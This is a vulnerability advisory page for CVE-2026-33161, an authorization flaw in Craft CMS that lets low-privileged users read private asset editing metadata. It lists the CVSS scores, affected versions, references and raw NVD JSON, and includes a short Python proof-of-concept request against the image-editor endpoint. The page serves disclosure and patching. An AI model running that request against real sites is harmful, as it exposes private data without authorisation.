CVE-2026-33161

Description

Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can call assets/image-editor with the ID of a private asset they cannot view and still receive editor response data, including focalPoint. The endpoint returns private editing metadata without per-asset authorization validation. This issue has been patched in versions 4.17.8 and 5.9.14.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE

Craft CMS >= 4.0.0-RC1, < 4.17.8

Craft CMS >= 5.0.0-RC1, < 5.9.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "https://target-site.com/assets/image-editor"
private_asset_id = "12345"  # ID of a private asset the user cannot view
session_cookie = {"CraftSessionId": "low_privilege_session_token"}

# Exploit: Request image editor data for a private asset
# The vulnerability lies in the lack of authorization check on the assetId
payload = {
    "assetId": private_asset_id
}

try:
    response = requests.get(target_url, params=payload, cookies=session_cookie)
    if response.status_code == 200:
        print("[+] Vulnerability confirmed! Leaked data:")
        print(response.json())
    else:
        print("[-] Request failed or patched.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33161
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33161
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33161/
[4] VulDB https://vuldb.com/cve/CVE-2026-33161
[5] https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27
[6] https://github.com/craftcms/cms/releases/tag/4.17.8
[7] https://github.com/craftcms/cms/releases/tag/5.9.14
[8] https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33161", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:10.250", "lastModified": "2026-03-26T17:09:11.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can call assets/image-editor with the ID of a private asset they cannot view and still receive editor response data, including focalPoint. The endpoint returns private editing metadata without per-asset authorization validation. This issue has been patched in versions 4.17.8 and 5.9.14."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 4.0.0-RC1 hasta antes de la versión 4.17.8 y desde la versión 5.0.0-RC1 hasta antes de la versión 5.9.14, un usuario autenticado con bajos privilegios puede llamar a assets/image-editor con el ID de un activo privado que no puede ver y aun así recibir datos de respuesta del editor, incluyendo focalPoint. El endpoint devuelve metadatos de edición privados sin validación de autorización por activo. Este problema ha sido parcheado en las versiones 4.17.8 y 5.9.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartExcluding": "4.0.0", "versionEndExcluding": "4.17.8", "matchCriteriaId": "6D076F04-8397-4ED0-8428-6D04B786A0A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartExcluding": "5.0.0", "versionEndExcluding": "5.9.14", "matchCriteriaId": "7ADCA708-F32E-4943-B523-CF5029C48A50"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "610F6DE9-720F-45B3-81D5-18E7F6B090FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27", "source": "s ... (truncated)